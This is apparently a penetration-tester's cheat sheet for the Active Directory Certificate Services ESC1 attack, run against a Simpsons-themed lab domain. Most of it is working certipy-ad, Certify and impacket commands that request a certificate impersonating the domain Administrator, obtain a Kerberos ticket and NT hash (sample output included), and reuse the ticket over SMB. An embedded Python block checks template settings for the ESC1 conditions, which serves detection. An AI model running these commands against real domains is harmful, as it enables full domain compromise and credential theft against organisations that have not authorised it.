Technique

ESC1

 

1.0 certipy-ad

1.1 Find vulnerable ESC1 templates

Either dump the AD CS objects in the legacy BloodHound format and import them, or let certipy print the templates it flags as vulnerable straight to stdout:

certipy-ad find -u krustytheclown@thesimpsons.springfield.local -p krustytheclown -scheme ldap -old-bloodhound

certipy-ad find -u krustytheclown@thesimpsons.springfield.local -p krustytheclown -vulnerable -stdout
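The checks behind certipy's -vulnerable flag, as an added example that is not part of the original page or of Certipy itself: the ESC1 predicate evaluated over a few constructed template records. The template names, domain SID and CA name below are made up for illustration, and the flag constants and OIDs are the documented AD CS values. A template is ESC1-exploitable when a low-privileged principal can enroll, the enrollee supplies the subject, no manager approval or authorized signature is required, the EKU permits client authentication, and the template is published on a CA.

```python
# Added example: the ESC1 predicate "certipy find -vulnerable" applies, run over
# constructed template records. Not code from the original page or from Certipy;
# attribute names follow the AD schema, flag values are the documented constants.

# msPKI-Certificate-Name-Flag: requester may put an arbitrary subject/SAN in the CSR
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001
# msPKI-Enrollment-Flag: requests are held for CA manager approval
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002

# EKUs that allow the issued certificate to be used for Kerberos (PKINIT) logon
CLIENT_AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2",       # Client Authentication
    "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
    "2.5.29.37.0",             # Any Purpose
}

DOMAIN_SID = "S-1-5-21-1111-2222-3333"   # constructed domain SID for the sample data
LOW_PRIV_SIDS = {
    "S-1-1-0",               # Everyone
    "S-1-5-11",              # Authenticated Users
    "S-1-5-32-545",          # BUILTIN\Users
    DOMAIN_SID + "-513",     # Domain Users
    DOMAIN_SID + "-515",     # Domain Computers
}


def allows_client_auth(ekus):
    """No EKU at all means 'any purpose', which also covers client authentication."""
    return not ekus or bool(set(ekus) & CLIENT_AUTH_EKUS)


def is_esc1(tpl):
    """Return (vulnerable, failed_checks) for one template record."""
    checks = {
        "enrollee supplies subject": bool(tpl["msPKI-Certificate-Name-Flag"] & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT),
        "no manager approval": not (tpl["msPKI-Enrollment-Flag"] & CT_FLAG_PEND_ALL_REQUESTS),
        "no authorized signatures": tpl["msPKI-RA-Signature"] == 0,
        "client-auth EKU": allows_client_auth(tpl["pKIExtendedKeyUsage"]),
        "low-priv enrollment rights": bool(set(tpl["enroll"]) & LOW_PRIV_SIDS),
        "published on a CA": bool(tpl["cas"]),
    }
    failed = [name for name, ok in checks.items() if not ok]
    return (not failed, failed)


# Constructed sample templates, shaped like the objects certipy reads from
# CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,...
TEMPLATES = {
    "ESC1": {   # the classic misconfiguration
        "msPKI-Certificate-Name-Flag": 0x1,
        "msPKI-Enrollment-Flag": 0x0,
        "msPKI-RA-Signature": 0,
        "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2"],
        "enroll": [DOMAIN_SID + "-513"],
        "cas": ["SPRINGFIELD-CA"],
    },
    "User": {   # stock template: subject is built from AD, not taken from the CSR
        "msPKI-Certificate-Name-Flag": 0xA6000000,
        "msPKI-Enrollment-Flag": 0x29,
        "msPKI-RA-Signature": 0,
        "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2", "1.3.6.1.5.5.7.3.4", "1.3.6.1.4.1.311.10.3.4"],
        "enroll": [DOMAIN_SID + "-513"],
        "cas": ["SPRINGFIELD-CA"],
    },
    "WebServer": {   # constructed: Domain Users may enroll, but EKU is Server Authentication only
        "msPKI-Certificate-Name-Flag": 0x1,
        "msPKI-Enrollment-Flag": 0x0,
        "msPKI-RA-Signature": 0,
        "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.1"],
        "enroll": [DOMAIN_SID + "-513"],
        "cas": ["SPRINGFIELD-CA"],
    },
    "ESC1-Approved": {   # same as ESC1, but a CA manager must approve each request
        "msPKI-Certificate-Name-Flag": 0x1,
        "msPKI-Enrollment-Flag": 0x2,
        "msPKI-RA-Signature": 0,
        "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2"],
        "enroll": [DOMAIN_SID + "-513"],
        "cas": ["SPRINGFIELD-CA"],
    },
}


def find_esc1(templates):
    """Names of the templates that pass every ESC1 check."""
    return sorted(name for name, tpl in templates.items() if is_esc1(tpl)[0])


if __name__ == "__main__":
    for name, tpl in TEMPLATES.items():
        vulnerable, failed = is_esc1(tpl)
        print(f"{name:14} {'ESC1' if vulnerable else 'not ESC1':9} {failed}")
```

The failed-check list is the useful part when triaging: a template that misses on only one condition (WebServer with a non-client-auth EKU, or a template gated by manager approval) is the kind that a later change by an administrator turns into an ESC1 path, so it is worth tracking even though it is not exploitable today.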

1.2 Certificate request

In BloodHound, the shortest-path query shows which group holds enrollment rights on the template. Then request a certificate and supply the target account's UPN as the alternative name; this is what the template's "enrollee supplies subject" setting allows, and certipy saves the result as administrator.pfx:

certipy-ad req -username krustytheclown@thesimpsons.springfield.local -password krustytheclown -target-ip duffbrewery.springfield.local -ca 'SPRINGFIELD-CA' -template 'ESC1' -upn 'Administrator@springfield.local'

1.3 Authentication

certipy-ad auth -pfx administrator.pfx
 
[*] Using principal: administrator@springfield.local
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@springfield.local': aad3b435b51404eeaad3b435b51404ee:c66d72021a2d4744409969a581a1705e
 
Point KRB5CCNAME at the cache certipy wrote (administrator.ccache, not .ccname) and use the ticket; give the target by hostname, since the service ticket is issued for the host's SPN and will not match an IP address:

export KRB5CCNAME=administrator.ccache

impacket-smbclient @duffbrewery.springfield.local -no-pass -k

2.0 Certify / Rubeus

2.1 Find vulnerable ESC1 templates

List the enterprise CAs, then the templates Certify flags as vulnerable:

certify cas
certify find /vulnerable

2.2 Certificate request

certify request /template:!templatename /ca:!computername.!domain.local\!CAname

certify request /ca:krustyland.ogdenville.local\OGDENVILLE-CA /template:ESC1 /altname:krustyland /machine

The /ca value is hostname\CA-name with a single backslash when typed in cmd.exe; double it only in a shell that escapes backslashes. /altname sets the subject alternative name the certificate is issued for, and /machine runs the request in the machine context. Certify returns the certificate and private key as PEM, which must be converted to a PFX before it can be used to authenticate.
